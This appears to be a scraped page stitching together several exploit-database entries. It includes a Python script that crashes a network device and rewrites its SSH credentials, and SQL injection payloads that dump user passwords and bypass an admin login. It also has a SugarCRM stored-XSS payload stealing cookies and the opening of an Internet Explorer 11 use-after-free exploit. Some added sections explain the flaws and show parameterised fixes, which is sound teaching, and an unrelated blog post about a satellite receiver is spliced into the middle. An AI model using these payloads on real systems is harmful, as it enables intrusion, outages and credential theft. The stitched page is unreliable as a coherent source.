            attack = arg
        elif opt in ("-u", "--user"):
            username = arg
        elif opt in ("-p", "--password"):
            password = arg

    if username != "" and password != "" and attack == "3":
        print("Starting SSH attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
        finished = attack_ssh(target, username, password)
    elif attack == "1":
        print("Starting DoS reset attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack)
        finished = dos_one(target)
    elif attack == "2":
        print("Starting DoS non-reset attack!")
        print(divider)
        print("Target: ", target, "\nAttack: ", attack)
        finished = dos_two(target)
    print(divider)
    if finished == 1:
        print("DoS reset attack completed!")
    elif finished == 2:
        print("DoS non-reset attack completed!")
        print("Device must be power cycled to restore functionality.")
    elif finished == 3:
        tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
        connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
        print(tell)
        print("You must specify the key exchange when connecting or the device will be DoS'd!")
        print(connection_example)
    elif finished == 0:
        print("Something strange happened. Attack likely unsuccessful.")
    sys.exit()


def dos_one(target):
    url = "http://%s/localmenus.cgi" % target
    data = "A" * 46
    payload = {"func": "609", "data": data, "rphl": "1"}
    print("FIRING ZE MIZZLES!")
    for i in range(1000):
        try:
            r = requests.post(url=url, params=payload, timeout=5)
            if r.status_code != 200:
                print("Device doesn't appear to be functioning or web access is not enabled.")
                sys.exit()
        except requests.exceptions.RequestException:
            return 1
    return 0


def dos_two(target):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(15)
    try:
        sock.connect((target, 22))
    except OSError:
        print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
        sys.exit()
    transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
                                                                         "diffie-hellman-group14-sha1",
                                                                         "diffie-hellman-group1-sha1"]})
    fd = os.open("/dev/null", os.O_WRONLY)
    savefd = os.dup(2)
    os.dup2(fd, 2)
    try:
        transport.connect(username="notreal", password="notreal")
    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
        os.dup2(savefd, 2)
        return 2
    return 0


def attack_ssh(target, username, password):
    url = "http://%s/localmenus.cgi" % target
    payload_user = {"func": "403", "set": "401", "name1": username, "name2": username}
    payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password}
    print("FIRING ZE MIZZLES!")
    try:
        r = requests.post(url=url, params=payload_user, timeout=5)
        if r.status_code != 200:
            print("Device doesn't appear to be functioning or web access is not enabled.")
            sys.exit()
        r = requests.post(url=url, params=payload_pass, timeout=5)
        if r.status_code != 200:
            print("Device doesn't appear to be functioning or web access is not enabled.")
            sys.exit()
    except requests.exceptions.RequestException:
        print("Device doesn't appear to be functioning or web access is not enabled.")
        sys.exit()
    return 3


if __name__ == "__main__":
    main(sys.argv[1:])
-
Car Rental Management System 1.0 - 'car_id' Sql Injection
# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
# Date: 2020-11-13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: car_id
-------------------------------------------------------------------------
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Source Code: booking.php:
--------------------------------------------------------------------
<?php
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
foreach($qry->fetch_array() as $k => $val){
    $$k=$val;
}

Vulnerable param: id
-------------------------------------------------------------------------
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Source Code: view_car.php:
--------------------------------------------------------------------
<?php
if(isset($_GET['id'])){
    if(isset($_GET['id'])){
        $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
-
Title: [Miscellaneous Talk] Notes on tuning a "household connection" (Hu Hu Tong) satellite receiver and fixing the "E04 This channel is not authorized" error
With the spread of the Internet and smart TVs, old-fashioned TVs and watching programmes through a satellite dish (the "TV pot") are gradually being phased out. That new things inevitably displace old ones is the way history goes. But if there are elderly people at home, they will not use a smart TV, and it charges all sorts of annoying fees. It is still too hard to explain all that to the old man!

Background
When I went home for Chinese New Year, the elderly in the village said the TV at home no longer worked; it had not been switched on for almost a year. In a try-and-see spirit, I started tuning the TV channels.

Connection and debugging
The difficulty in tuning an old-style satellite dish is that the deflection direction and elevation parameters differ from region to region. There are two ways to get the deflection angle right. The first is to copy the deflection angle and elevation of a dish belonging to another user in the same village. The second is to follow the WeChat official account of the "State Administration of Radio, Film and Television" and ask its manual customer service for the settings for your location. If nothing unexpected happens, the signal strength and signal quality indicators turn green. Click automatic search and the corresponding channels appear.

E04 This channel is not authorized
The main cause of this error is that the receiver has been switched off for a long time and its authorization information has been lost, so it needs to be reactivated. First, with the receiver powered on, unplug the receiver's card and find the card number. Then tune to channel 999 and activate following the prompts. I recommend calling customer service directly to reactivate; activation through the official account may take a long time. After activation, wait about 2 to 5 minutes before the picture appears.
To be honest, it is still convenient to watch TV this way. There is no network delay and no need to watch TV.
-
SugarCRM 6.5.18 - Persistent Cross-Site Scripting
# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-16
# Vendor Homepage: https://www.sugarcrm.com
# Version: 6.5.18

Document Title:
===============
SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2249

Release Date:
=============
2020-11-16

Vulnerability Laboratory ID (VL-ID):
====================================
2249

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
SugarCRM empowers your marketing, sales and services teams to collaborate across the entire customer lifecycle for more meaningful, memorable experiences. More than 2 million users in 120 countries have switched to SugarCRM to fuel extraordinary customer experiences. We have disrupted the market with a relentless pursuit of innovation and visionary solutions, bringing the world's first no-touch, time-aware CX platform. The CX suite aggregates the millions of different data points on your customers and turns them into proactive truths, trends and predictions for you to leverage.

(Copy of the Homepage: https://www.sugarcrm.com )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the official SugarCRM v6.5.18 web-application.

Affected Product(s):
====================
SugarCRM
Product: SugarCRM v6.5.18 - CRM (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-05-03: Researcher Notification & Coordination (Security Researcher)
2020-05-04: Vendor Notification (Security Department)
2020-05-24: Vendor Notification (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SugarCRM v6.5.18 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The persistent cross site web vulnerability is located in the primary address state and alternate address state input fields of the contact creation form of the sales and support modules. Remote attackers with low privileged SugarCRM accounts are able to store their own malicious script code as a contact. Higher privileged application users execute the script code when previewing the created contact, which can be used e.g. to gain moderator or administrator rights via session hijacking, phishing or further persistent manipulative web attacks. The code executes not only in the section where the contact is listed or previewed but also, after save, in the view log function context.

The attack can thus be performed by creating a contact or by importing a vcf contact file. The request method used to inject is POST and the attack is limited to registered user accounts with default access to the contacts module. The script code bypasses the basic validation process because the primary address state and alternate address state are exchanged in the transmitted request. In a regular transmit the context is parsed securely; in the actual case an attacker injects script code into the alternate address while changing the main address, and the wrongly sanitized code reaches the front-end.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Sales
[+] Support

Vulnerable Input(s):
[+] Primary Address State
[+] Alternate Address State

Vulnerable Parameter(s):
[+] primary_address_state
[+] alt_address_state

Affected Module(s):
[+] Sales - Contact List
[+] Support - Contact List

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the sugarcrm application
2. Login as low privileged user account
3. Move to sales or support and click to contact, then open create a new contact
4. Inject the payload into the alternate address state and primary address state input fields of the other address and primary address
5. Save the entry and a refresh occurs with the inserted contact details
   Note: The script code executes immediately after saving in the primary address state and alternate address state section of both modules
6. Successful reproduce of the persistent cross site scripting web vulnerability!

PoC: Payload
><iframe src=evil.source onload=alert(document.domain)>

PoC: Vulnerable Source
<tr><td scope="col" width="12.5%"> Primary Address: </td>
<td width="37.5%">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="99%">
<input type="hidden" class="sugar_field" id="primary_address_street" value="q">
<input type="hidden" class="sugar_field" id="primary_address_city" value="a">
<input type="hidden" class="sugar_field" id="primary_address_state" value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
<input type="hidden" class="sugar_field" id="primary_address_country" value="y">
<input type="hidden" class="sugar_field" id="primary_address_postalcode" value="p">
</td><td class="dataField" width="1%"> </td></tr>
</tbody></table></td>
<td scope="col" width="12.5%"> Other Address:</td>
<td width="37.5%">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td width="99%">
<input type="hidden" class="sugar_field" id="alt_address_street" value="n">
<input type="hidden" class="sugar_field" id="alt_address_city" value="a">
<input type="hidden" class="sugar_field" id="alt_address_state" value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
<input type="hidden" class="sugar_field" id="alt_address_country" value="k">
<input type="hidden" class="sugar_field" id="alt_address_postalcode" value="r">
</td>
<td class="dataField" width="1%"> </td>
</tr>
</tbody></table>
</td>
</tr>

--- PoC Session Logs [POST] ---
https://sugar-crm.localhost:8000/index.php
Host: sugar-crm.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1336
Origin: https://sugar-crm.localhost:8000
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://sugar-crm.localhost:8000/index.php
Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1; PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1; PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5; ck_login_id_20=1; ck_login_language_20=en_us; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; EmailTreeLayout=42f3ef1b-3d1b-eac3-16a7-5eaeeeaae11c=false&713e7381-3309-2845-3c71-5eaeee59f0ca=false&be8b5121-f32c-13fd-cd9c-5eaeeec3b167=false&e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23
-
module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&isDuplicate=false&action=Save&return_module=Contacts&
return_action=DetailView&return_id=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_tab=&contact_role=&relate_to=Contacts&
relate_id=45ab08a6-6ca8-fd0f-c4cb5eaef0e0ef02&offset=1&opportunity_id=&case_id=&bug_id=&email_id=&inbound_email_id=&
salutation=Mr.&first_name=nam23&last_name=e&phone_work=n&title=r&phone_mobile=h&department=t&phone_fax=k&account_name=&
account_id=&primary_address_street=h&primary_address_city=z&
primary_address_state=t<iframe src=evil.source onload=aler(document.cookie)>&primary_address_postalcode=b&
primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe src=evil.source onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0&
emailAddressWidget=1&Contacts0emailAddress0=&Contacts0emailAddressId0=&
Contacts0emailAddressPrimaryFlag=Contacts0emailAddress0&Contacts0emailAddressVerifiedFlag0=true&
Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe src=a>&report_to_name=&
reports_to_id=&sync_contact=0,1&lead_source=Web Site&do_not_call=0&campaign_name=&campaign_id=&
assigned_user_name=h%20m&assigned_user_id=1
-
POST: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Location: index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1
Server: Microsoft-IIS/8.5
Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000
ck_login_language_20=en_us; Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000
sugar_user_theme=Sugar5; Max-Age=31536000
X-Powered-By: ASP.NET
Content-Length: 231
-
https://sugar-crm.localhost:8000/index.php?module=Contacts&action=index
https://sugar-crm.localhost:8000/index.php?module=Audit&action=Popup&query=true&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_name=Contacts
https://sugar-crm.localhost:8000/index.php?module=Import&action=Step1&import_module=Contacts&return_module=Contacts&return_action=index

Solution - Fix & Patch:
=======================
The vulnerability can be patched following the next steps ...
1. Restrict the input fields and disallow special chars for the main name values displayed in the list
2. Escape the input transmitted from the alternate and primary inputs
3. Parse and sanitize the output location to ensure it is filtered securely

Security Risk:
==============
The security risk of the persistent cross site web vulnerability in the sugarcrm web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
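Why the advisory's payload works, and why fix step 3 (escape at the output location) is the one that closes it: SugarCRM writes the stored state value into the `value="..."` attribute of a hidden input, and a value that first closes that attribute can terminate the tag and start an `<iframe>`. The script below is an added example written for this page, not SugarCRM code or the advisory's PoC. The sink is copied from the advisory's "PoC: Vulnerable Source"; the payload is the advisory's iframe with a leading double quote added (an assumption, so that the breakout from the double-quoted attribute is explicit). It renders the field with raw interpolation and with `html.escape(..., quote=True)`, then parses both results with the standard-library HTML parser to show what a browser would see.

```python
from html import escape
from html.parser import HTMLParser

# Assumed payload: the advisory's iframe with a leading double quote so that it
# closes the double-quoted value attribute it lands in.
PAYLOAD = '"><iframe src=evil.source onload=alert(document.domain)>'

# Sink taken from the advisory's "PoC: Vulnerable Source".
TEMPLATE = '<input type="hidden" class="sugar_field" id="alt_address_state" value="{}">'


def render_unescaped(state: str) -> str:
    """Vulnerable rendering: the stored field is interpolated verbatim."""
    return TEMPLATE.format(state)


def render_escaped(state: str) -> str:
    """Hardened rendering: attribute-context escaping at the output location.
    quote=True is what turns the closing '"' into &quot; as well."""
    return TEMPLATE.format(escape(state, quote=True))


class ElementCollector(HTMLParser):
    """Records every start tag and its attributes, the way a browser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)


def inspect(rendered: str) -> dict:
    p = ElementCollector()
    p.feed(rendered)
    p.close()
    return {
        "tags": p.tags,
        "input_value": p.attrs.get("input", {}).get("value"),
        "iframe_onload": p.attrs.get("iframe", {}).get("onload"),
    }


def vulnerable_result() -> dict:
    # Expect a second element, iframe, with its onload handler intact.
    return inspect(render_unescaped(PAYLOAD))


def hardened_result() -> dict:
    # Expect a single input whose value attribute holds the whole payload as text.
    return inspect(render_escaped(PAYLOAD))


if __name__ == "__main__":
    print("raw:    ", vulnerable_result())
    print("escaped:", hardened_result())
```

The escaped rendering is the check a reviewer can apply to fix step 1 as well: restricting characters in the input helps, but the value also arrives via vcf import and via the primary/alternate swap the advisory describes, so the escaping has to sit at the sink, not at one of the entry points.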
-
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
# Date: 17-11-2020
# Exploit Author: Kislay Kumar
# Vendor Homepage: http://egavilanmedia.com
# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/
# Version: N/A (Default)
# Tested on: Kali Linux

SQL Injection:
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve sensitive information, such as the database structure, tables, columns, and their underlying data.

Attack Vector:
An attacker can gain admin panel access using malicious SQL injection queries.

Steps to reproduce:
1. Open the admin login page using the following URL:
   -> http://localhost/admin/login.html
2. Put the payload below in both fields (User ID & Password)
   Payload: admin' or '1'='1
3. The server accepts the payload and the admin panel is reached without any credentials.

Because AND binds tighter than OR, a login query of the form `WHERE user='<id>' AND pass='<pw>'` becomes `user='admin' OR ('1'='1' AND pass='admin') OR '1'='1'`, which is true for every row, so the first account in the table is returned as the logged-in user.

IMPACT:
An attacker who gains admin panel access can update and delete user data.

Suggested Mitigation/Remediation Actions:
Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible, security-specific libraries should be used in order to provide an additional layer of protection.
-
Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
# Google Dork: N/A
# Date: 11/16/2020
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/
# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip
# Version: 1.0
# Tested on: Win10 x64, Kali Linux x64
# CVE : N/A

######## Description ########
#
# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System.
#
# In getuser.php file, GET parameter 'q' is vulnerable.
#
# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.
#
#############################

Vulnerable code:

include_once 'assets/conn/dbconnect.php';
$q = $_GET['q']; // Vulnerable param
// echo $q;
$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point

Used Payload:

http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23

URL-decoded, the value of q is:

1' UNION ALL SELECT NULL,CONCAT(0x7162717671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7176627871),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA#

The leading quote closes the string literal, the six-column SELECT matches the column count of `doctorschedule` (a UNION requires equal column counts), and the trailing `#` comments out the closing quote the PHP code appends.

Output:

Extracted database: qbqvqdb_healthcareqvbxq

0x7162717671 and 0x7176627871 are the marker strings "qbqvq" and "qvbxq" that sqlmap-style payloads wrap around the extracted value so it can be found in the page; the schema name between them is db_healthcare.
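The three SQL injection advisories above (Car Rental Management System, the EgavilanMedia admin login, and the Online Doctor Appointment Booking System) share one root cause: a request parameter concatenated into the SQL text. They differ only in the context the parameter lands in, an unquoted number, two single-quoted strings, or one single-quoted string, which decides how the payload must begin. The script below is an added example written for this page, not code from any of the three projects or advisories. It rebuilds the three query shapes over an in-memory SQLite database with constructed sample rows (table and column names `users.username`/`password`, `cars.id` and `doctorschedule.scheduleDate` come from the advisories; the other columns, the three-column layouts and the data are assumptions), runs the page's payloads against each concatenating query and against its parameterised counterpart, and returns what each query gives back. SQLite differs from the MySQL targets in three spellings, noted in the code: `||` instead of `CONCAT()`, `--` instead of `#`, and `sqlite_master` in place of `INFORMATION_SCHEMA.SCHEMATA`.

```python
import sqlite3
from typing import Optional

# Constructed sample schema and rows: table and column names follow the three
# advisories (users.username/password, cars.id, doctorschedule.scheduleDate);
# the remaining columns, the 3-column layouts and the data are assumptions.
SCHEMA = """
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'bob', 'hunter2');
CREATE TABLE cars(id INTEGER, model TEXT, daily_rate INTEGER);
INSERT INTO cars VALUES (1, 'Corolla', 40), (2, 'Civic', 45), (3, 'Model 3', 90);
CREATE TABLE doctorschedule(id INTEGER, scheduleDate TEXT, doctor TEXT);
INSERT INTO doctorschedule VALUES (1, '2020-11-16', 'Dr. Lee');
"""


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


# --- the three concatenating query shapes from the advisories ---------------

def vuln_car(con, car_id: str) -> list:
    # booking.php / view_car.php: numeric context, nothing to quote out of
    return con.execute("SELECT * FROM cars where id= " + car_id).fetchall()


def vuln_login(con, user: str, pw: str) -> Optional[tuple]:
    # admin login: two single-quoted string contexts
    sql = ("SELECT username FROM users WHERE username='" + user
           + "' AND password='" + pw + "'")
    return con.execute(sql).fetchone()


def vuln_schedule(con, q: str) -> list:
    # getuser.php: one single-quoted string context
    return con.execute(
        "SELECT * FROM doctorschedule WHERE scheduleDate='" + q + "'").fetchall()


# --- parameterised counterparts: values are bound, never parsed as SQL -------

def safe_car(con, car_id: str) -> list:
    if not car_id.isdigit():          # server-side type check on top of binding
        return []
    return con.execute("SELECT * FROM cars WHERE id = ?", (int(car_id),)).fetchall()


def safe_login(con, user: str, pw: str) -> Optional[tuple]:
    return con.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (user, pw)).fetchone()


def safe_schedule(con, q: str) -> list:
    return con.execute("SELECT * FROM doctorschedule WHERE scheduleDate=?", (q,)).fetchall()


# SQLite spellings of the page's payloads: '||' for CONCAT(), '--' for '#',
# sqlite_master in place of INFORMATION_SCHEMA.SCHEMATA. Column counts (3)
# match the tables above the way the advisories' 10- and 6-column SELECTs
# match theirs.
CAR_UNION = "-3 UNION ALL SELECT 1, username || ':' || password, 3 FROM users--"
TAUTOLOGY = "admin' or '1'='1"
SCHED_UNION = ("1' UNION ALL SELECT NULL, 'qbqvq' || name || 'qvbxq', NULL "
               "FROM sqlite_master WHERE type='table'--")


def strip_markers(s: str) -> str:
    """Return what sits between the sqlmap-style markers qbqvq ... qvbxq."""
    return s[s.index("qbqvq") + 5:s.index("qvbxq")]


def demo() -> dict:
    con = make_db()
    return {
        "car_vuln": [row[1] for row in vuln_car(con, CAR_UNION)],
        "car_safe": safe_car(con, CAR_UNION),
        "login_vuln": vuln_login(con, TAUTOLOGY, TAUTOLOGY),
        "login_safe": safe_login(con, TAUTOLOGY, TAUTOLOGY),
        "sched_vuln": sorted(strip_markers(r[1]) for r in vuln_schedule(con, SCHED_UNION)),
        "sched_safe": safe_schedule(con, SCHED_UNION),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The negative id in `CAR_UNION` is the same trick as the `-3` in the view_car.php request: it makes the legitimate half of the UNION return nothing, so the only rows rendered are the ones the attacker selected. The parameterised versions return nothing for the same inputs because the driver hands the payload to the engine as a value, so the quote, the UNION and the comment are all just characters in a string.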
-
Microsoft Internet Explorer 11 - Use-After-Free
# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
# Date: 2020-05-07
# Exploit Author: maxpl0it
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
# Version: IE 8, 9, 10, and 11
# Tested on: Windows 7 (x64)
# CVE : CVE-2020-0674

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
<script language="JScript.Compact">
// -------------------------------------------------------------------------------------------------
//
// Credits:
//     maxpl0it (@maxpl0it) - Writing the exploit
//     Qihoo 360 - Identifying the vulnerability in the wild
//
//
// Vulnerability: Use-After-Free when Array.sort() is called with a comparator function. The two
//                arguments are untracked by the garbage collector.
//
// Exploit Description: This exploit was written for 64-bit IE instances.
//                      However, Enhanced Protected Mode sandboxing could be enabled for IE 10
//                      and IE 11 because EPM on Windows 7 simply enables x64 and doesn't do
//                      much else.
//                      The exploit executes C:\Windows\System32\calc.exe but doesn't implement
//                      any form of process continuation after execution.
//
// Testing:
//     OS tested on: Windows 7
//     IE versions tested on:
//         8 (x64 version)
//         9 (x64 version)
//         10 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
//         11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
//
// Further notes:
//     Video at https://twitter.com/maxpl0it/status/1253396942048104448
//
//     The debug is better viewed in the console. Open Developer Tools and enable debug below.
//
//     This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
//
//     If you receive the error "Couldn't rewrite variable", verify that this is 64-bit IE and not a
//     32-bit process (iexplorer.exe and not iexplorer.exe *32)
//
// ------------------------------------------------------------------------------------------------------

// write_debug: Used to show debugging output.
function write_debug(str_to_write) {
    if(debug) { // Switch is below
        try{
            console.log(str_to_write); // In IE, console only works if devtools is open.
        } catch(e) {
            try {
                alert(str_to_write); // A lot of popups but provides information.
            } catch(e) {
                // Otherwise, nothing.
            }
        }
    }
}

// Globals
var depth;           // Used to track the depth of the recursion for the exploit function.
var spray;           // Used to spray objects and fill GcBlocks.
var overlay;         // Used to hold objects that will eventually contain properties that will reallocate freed GcBlocks.
var overlay_backup;  // Used to make sure that the overlay objects still have a reference after the exploit is done. Otherwise they would be freed and reallocated.
var variants;        // A string that contains a bunch of fake VAR structures. This is the property name that will cause the freed GcBlock to be reallocated.
var total;           // Used to hold the untracked variable pointers for the use-after-free.
var leak_lower;      // Holds the least significant DWORD of the 'next VVAL' pointer leak.
var leak_offset;     // Since we don't want to free all overlay variables, this value will be used to identify which property we have got a pointer for so only this will be freed and reallocated later.
var leak_verify_var; // Used to verify that the rewrite worked. If the overlay cannot be freed and reallocated, then the exploit will not work.
var fakeobj_var;     // Points at the property name string in the final VVAL. When the property name changes, a fake VAR is constructed in the name string and will change this fakeobj_var's type and object pointer values.
var trigger_obj;     // Will contain the fake object and vftable.
var context;         // Will store the context structure for NtContinue.

var padding = "AAAAAAAAAAA"; // Padding aligns so that the property with the manipulated hash will end up on top of an untracked var.
var leak = "\u0005";         // This manipulates the hash of the VVAL.
var leaked_var = "A";        // The final object property name. Needs to be created so that the 'next VVAL' pointer of the manipulated hash VVAL is filled.
var spray_size = 20000;      // The size of the spray array.
var overlay_size = 20000;    // The size of the overlay array.
